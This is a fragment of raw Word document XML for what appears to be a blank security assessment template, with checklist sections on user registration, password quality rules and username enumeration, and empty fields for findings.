        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="005B1975" w:rsidRPr="00A51A96" w14:paraId="0088C03C" w14:textId="77777777" w:rsidTr="00364F0D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="149A5A59" w14:textId="305E8F3E" w:rsidR="005B1975" w:rsidRPr="003C713F" w:rsidRDefault="005B1975" w:rsidP="008C15E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4.1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0623F9" w:rsidRPr="000623F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test User Registration Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="633E7743" w14:textId="77777777" w:rsidR="0031286F" w:rsidRPr="00C93BEE" w:rsidRDefault="0031286F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6525"/>
      </w:tblGrid>
      <w:tr w:rsidR="0017043E" w:rsidRPr="00A02B04" w14:paraId="38B30F40" w14:textId="77777777" w:rsidTr="00C93BEE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2CAA7099" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00C93B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02B04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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AE59AD" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="008C15E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7043E" w:rsidRPr="00A02B04" w14:paraId="4DE24461" w14:textId="77777777" w:rsidTr="00C93BEE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485CD614" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00C93B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02B04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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C8D9036" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="008C15E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7043E" w:rsidRPr="00A02B04" w14:paraId="5A018B8B" w14:textId="77777777" w:rsidTr="00C93BEE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7C661221" w14:textId="76A855C8" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="00A5634A" w:rsidP="00C93B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634A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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECB22CC" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E" w:rsidP="008C15E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202A1AF" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="008C15E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7043E" w:rsidRPr="00A02B04" w14:paraId="4010D5CD" w14:textId="77777777" w:rsidTr="00C93BEE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08532C97" w14:textId="2D624D11" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="00A5634A" w:rsidP="00C93B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634A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Unrestricted Registrations Allowed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E24F34" w14:textId="4BCF2967" w:rsidR="0017043E" w:rsidRDefault="0017043E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B32E7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12349B" w:rsidRPr="0012349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Risk of Mass Registration/Bot Abuse?</w:t>
            </w:r>
            <w:r w:rsidRPr="00B32E7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A05807D" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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01F2C54" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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6F4622B" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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866C251" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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9398E31" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E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17043E" w:rsidRPr="00A02B04" w14:paraId="5631A474" w14:textId="77777777" w:rsidTr="00C93BEE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60E6F7CE" w14:textId="60840BDF" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0012349B" w:rsidP="00C93B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12349B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Duplicate Registrations Possible?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17BD8DFA" w14:textId="5AF5D2E0" w:rsidR="0017043E" w:rsidRPr="00665222" w:rsidRDefault="0017043E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6522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FD346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Yes/No, </w:t>
            </w:r>
            <w:r w:rsidR="00BB6D64" w:rsidRPr="00BB6D6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Can the Same Email/Username Be Reused?</w:t>
            </w:r>
            <w:r w:rsidRPr="0066522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DFC7820" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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9994854" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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8789D26" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E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E09E4" w:rsidRPr="00A02B04" w14:paraId="474E8F43" w14:textId="77777777" w:rsidTr="00C93BEE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497ED453" w14:textId="37FDBEA2" w:rsidR="00BE09E4" w:rsidRPr="00A02B04" w:rsidRDefault="00BE09E4" w:rsidP="00C93B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BB6D64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Role &amp; Permission Assignment Secure?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B42636D" w14:textId="77777777" w:rsidR="00BE09E4" w:rsidRPr="00BE09E4" w:rsidRDefault="00BE09E4" w:rsidP="00BE09E4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BE09E4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[*Yes/No, Can Users Modify Roles During Registration?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66210C39" w14:textId="77777777" w:rsidR="00BE09E4" w:rsidRDefault="00BE09E4" w:rsidP="00BE09E4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  <w:p w14:paraId="28C709F2" w14:textId="77777777" w:rsidR="00BE09E4" w:rsidRDefault="00BE09E4" w:rsidP="00BE09E4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  <w:p w14:paraId="392B259B" w14:textId="5920FEFF" w:rsidR="00BE09E4" w:rsidRPr="00A02B04" w:rsidRDefault="00BE09E4" w:rsidP="00BE09E4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17043E" w:rsidRPr="00A02B04" w14:paraId="4B5C3DCF" w14:textId="77777777" w:rsidTr="00C93BEE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2BDAE305" w14:textId="787A5B53" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="00524C07" w:rsidP="00C93B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24C07"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Identity Verification Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0743FCF4" w14:textId="7BEA28A4" w:rsidR="0017043E" w:rsidRDefault="0017043E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595E2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3276E4" w:rsidRPr="003276E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Email/Phone Verification Implemented?</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E2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64BD0B7" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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592DF89" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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E96698D" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E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17043E" w14:paraId="75B2E930" w14:textId="77777777" w:rsidTr="00C93BEE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2CBC0425" w14:textId="75F4D585" w:rsidR="0017043E" w:rsidRPr="00E109FF" w:rsidRDefault="003276E4" w:rsidP="00C93B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276E4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Fake or Forged Identity Data Accepted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F7C008" w14:textId="7FD49BCC" w:rsidR="0017043E" w:rsidRDefault="0017043E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3276E4" w:rsidRPr="003276E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Risk of Impersonation?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28EBC6A" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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8DEE941" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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95D2721" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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CB4414" w14:paraId="089C3191" w14:textId="77777777" w:rsidTr="00C93BEE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28E4380F" w14:textId="3807D44E" w:rsidR="00CB4414" w:rsidRPr="003276E4" w:rsidRDefault="00294B30" w:rsidP="00C93B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94B30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Anti-Bot Mechanisms in Place?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C12DA3" w14:textId="77777777" w:rsidR="00CB4414" w:rsidRDefault="00294B30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294B3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CAPTCHA, Honeypot, Other Techniques? Yes/No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06F2DD3" w14:textId="77777777" w:rsidR="00294B30" w:rsidRDefault="00294B30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0268CBD" w14:textId="77777777" w:rsidR="00294B30" w:rsidRDefault="00294B30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6474E85" w14:textId="213F1EF9" w:rsidR="00294B30" w:rsidRDefault="00294B30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62AE2" w14:paraId="08CC9589" w14:textId="77777777" w:rsidTr="00C93BEE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3846F768" w14:textId="6F862BCA" w:rsidR="00B62AE2" w:rsidRPr="00294B30" w:rsidRDefault="00B62AE2" w:rsidP="00C93B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62AE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Rate-Limiting Implemented?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0658CC51" w14:textId="77777777" w:rsidR="00B62AE2" w:rsidRDefault="00B62AE2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0F62E7" w:rsidRPr="000F62E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Vulnerable to Brute Force/Automated Registrations?</w:t>
            </w:r>
            <w:r w:rsidR="000F62E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110FC4E" w14:textId="77777777" w:rsidR="000F62E7" w:rsidRDefault="000F62E7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D42DDDA" w14:textId="77777777" w:rsidR="000F62E7" w:rsidRDefault="000F62E7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58E2275" w14:textId="7B4F56E4" w:rsidR="000F62E7" w:rsidRDefault="000F62E7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17043E" w14:paraId="1FD293F2" w14:textId="77777777" w:rsidTr="00C93BEE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6BA8CC39" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00531388" w:rsidRDefault="0017043E" w:rsidP="00C93B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B015D0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45AF953A" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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F52B6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Risk Details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BFCA8E9" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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6E8E07E" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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EF90057" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E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18ED6C8" w14:textId="77777777" w:rsidR="0017043E" w:rsidRDefault="0017043E" w:rsidP="008C15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17043E" w:rsidRPr="00A02B04" w14:paraId="61A159E6" w14:textId="77777777" w:rsidTr="00C93BEE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6C8263DB" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00C93B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02B04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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="613DCA8F" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00793428">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="53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A90AF7C" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00793428">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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BA8F23A" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00793428">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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B616E2A" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00793428">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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3CC2BF5" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="00793428">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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ABF22A9" w14:textId="77777777" w:rsidR="0017043E" w:rsidRPr="00A02B04" w:rsidRDefault="0017043E" w:rsidP="008C15E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16DD479A" w14:textId="77777777" w:rsidR="00941955" w:rsidRPr="00A51A96" w:rsidRDefault="00941955" w:rsidP="00941955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1955" w14:paraId="1C79E96D" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4210A408" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13718C85" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="062873FB" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58F6175C" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73EB0095" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19823E01" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3491792A" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BE22111" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D1B56BA" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CDAF755" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="574F68F2" w14:textId="77777777" w:rsidR="00941955" w:rsidRDefault="00941955" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34CB0DEB" w14:textId="77777777" w:rsidR="000623F9" w:rsidRDefault="000623F9" w:rsidP="000947B4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AF326C" w:rsidRPr="00A51A96" w14:paraId="7F412BF5" w14:textId="77777777" w:rsidTr="00364F0D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2F021DE2" w14:textId="1F9F9E37" w:rsidR="00AF326C" w:rsidRPr="003C713F" w:rsidRDefault="00AF326C" w:rsidP="008C15E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4.2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72759E" w:rsidRPr="0072759E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Password Quality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6126A17C" w14:textId="77777777" w:rsidR="008C0169" w:rsidRPr="00BD4A30" w:rsidRDefault="008C0169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451"/>
        <w:gridCol w:w="3555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w14:paraId="6C968EB9" w14:textId="77777777" w:rsidTr="00BD4A3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C537BD4" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00BD4A3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E7FD7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9C24324" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD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E7FD7" w:rsidRPr="00CE7FD7" w14:paraId="72566D77" w14:textId="77777777" w:rsidTr="00BD4A3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6EE3675" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00BD4A3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E7FD7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BAC0C08" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD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E7FD7" w:rsidRPr="00CE7FD7" w14:paraId="2CEA1C0D" w14:textId="77777777" w:rsidTr="00BD4A3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8B250E8" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00BD4A3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E7FD7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BD6DD06" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD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E7FD7" w:rsidRPr="00CE7FD7" w14:paraId="2708AEB6" w14:textId="77777777" w:rsidTr="00BD4A3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C42F5B7" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00BD4A3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E7FD7">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Password Quality Rules implemented and executed on the Host Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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FD942E7" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7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CE7FD7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55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CE84E17" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7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CE7FD7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CE7FD7" w:rsidRPr="00CE7FD7" w14:paraId="2F6E3808" w14:textId="77777777" w:rsidTr="00BD4A3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3233464" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00BD4A3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E7FD7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Password </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE7FD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Validation Techniques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89DA39D" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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29A9C38" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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067F68B" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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F6A2969" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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6C35EBC" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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01637FA" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD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E7FD7" w:rsidRPr="00CE7FD7" w14:paraId="27ECD9C2" w14:textId="77777777" w:rsidTr="00BD4A3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26845F3" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00BD4A3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E7FD7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5505A36" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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6A1A8C6" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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2D4A7FF" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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33DA2FA" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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EA21347" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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ACA8F6B" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRPr="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="00CE7FD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16DA31B5" w14:textId="77777777" w:rsidR="005406A2" w:rsidRPr="00A51A96" w:rsidRDefault="005406A2" w:rsidP="005406A2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06A2" w14:paraId="4783EA54" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB19E0E" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78096CDA" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CA1EB5F" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0ACF5EE0" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5077762A" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11FD0B58" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33A8D987" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FADF079" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62D2AEAC" w14:textId="77777777" w:rsidR="005406A2" w:rsidRDefault="005406A2" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D3B7063" w14:textId="77777777" w:rsidR="00CE7FD7" w:rsidRDefault="00CE7FD7" w:rsidP="000947B4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496375" w:rsidRPr="00A51A96" w14:paraId="6C6092CA" w14:textId="77777777" w:rsidTr="00642FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3019E485" w14:textId="446238C0" w:rsidR="00496375" w:rsidRPr="003C713F" w:rsidRDefault="00496375" w:rsidP="008C15E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4.3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C83884" w:rsidRPr="00C83884">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Username Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02025F97" w14:textId="77777777" w:rsidR="00496375" w:rsidRPr="00A1224B" w:rsidRDefault="00496375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2341"/>
        <w:gridCol w:w="4665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F376D9" w:rsidRPr="00F376D9" w14:paraId="5DD2C672" w14:textId="77777777" w:rsidTr="00F376D9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0A008D47" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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376D9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2388853" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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376D9" w:rsidRPr="00F376D9" w14:paraId="6714AD10" w14:textId="77777777" w:rsidTr="00F376D9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7A13EBA3" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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376D9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943BF74" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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376D9" w:rsidRPr="00F376D9" w14:paraId="2EB454A0" w14:textId="77777777" w:rsidTr="00F376D9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1F403C8B" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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376D9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E5F7264" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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376D9" w:rsidRPr="00F376D9" w14:paraId="64E699C9" w14:textId="77777777" w:rsidTr="00F376D9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="571F3FFC" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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376D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
